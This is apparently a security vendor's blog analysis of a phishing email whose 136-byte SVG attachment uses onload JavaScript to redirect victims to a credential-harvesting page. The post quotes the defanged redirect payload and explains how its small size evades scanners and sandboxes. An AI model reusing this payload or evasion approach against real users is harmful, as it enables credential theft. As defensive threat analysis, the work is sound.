136 Bytes Was All It Took: The SVG That Redirected to a Credential Harvest

The subject line referenced an ACH payment from "Hauck, Schumm and Carter." The body contained zero payment details. No amount, no routing number, no invoice reference. Just a disclaimer paragraph and a Mimecast scan notice declaring the message safe. The entire payload lived inside a 136-byte SVG attachment.

That file was small enough to fit in a tweet. It contained one line of JavaScript.

The Smallest Payload in the Queue

Open the SVG in a browser, and the onload event fires immediately: window.location='hxxps://cic-news[.]ca/dontcare/#[recipient-token]'. No rendering. No image. No user interaction required beyond double-clicking the file. The browser redirects to a credential harvesting page, with the recipient's email address appended as a URL fragment so the landing page can pre-populate the login form.

At 136 bytes, this attachment is deliberately minimal. It contains no embedded images, no styling, no viewBox attributes. Static file scanners that look for suspicious content patterns (embedded forms, obfuscated scripts, external resource loading) find almost nothing to evaluate. The file is so small that heuristic engines designed for complex payloads may skip it entirely. The JavaScript is a single assignment statement, not a multi-stage decoder chain, which keeps it below the threshold that most sandbox environments flag as suspicious.

An Email With Nothing Inside

The email body itself was a study in minimalism. A boilerplate corporate disclaimer about confidentiality and intended recipients. A Mimecast scan notice. No salutation, no message content, no payment instructions. The subject line did all the social engineering work, creating an expectation of financial content that could only be satisfied by opening the attachment.

This pattern inverts the typical phishing structure. Most lures put the social engineering in the body and hide the payload behind a link or button. Here, the body was intentionally empty so that the attachment became the only actionable element. The recipient either opens the SVG or ignores the email entirely. There is no middle ground, no link to hover over, no button text to scrutinize.

The authentication picture reinforced the suspicion. SPF failed for the sending IP 178[.]211[.]155[.]35, which resolved to a deltahost PTR record in Frankfurt. No DKIM signature was present. No DMARC record existed for the sender domain. The Return-Path was empty, and the Message-ID referenced localhost, a header combination that no legitimate payment processor would produce.

See Your Risk: Calculate how many threats your SEG is missing

Indicators of Compromise

MITRE ATT&CK Mapping